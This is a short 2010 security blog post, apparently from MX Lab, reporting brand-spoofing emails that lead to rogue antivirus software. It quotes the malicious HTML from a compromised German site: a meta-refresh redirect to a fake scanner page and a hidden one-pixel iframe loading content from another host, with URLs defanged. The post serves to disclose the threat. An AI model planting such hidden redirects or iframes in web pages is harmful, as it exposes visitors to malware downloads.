Campaign with emails that lead to rogue AV software antivirus_24.exe continues

August 10, 2010 Leave a Comment

MX Lab reported yesterday of emails where famous brands are used to lead users to a web site that hosts a malicious file antivurs_24.exe.

Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

After 4 second syou will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.

More information regarding the treath can be found in the blog post Malicious emails lead to rogue AV software antivirus_24.exe.

Filed under Malware, Viruses

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 108 other followers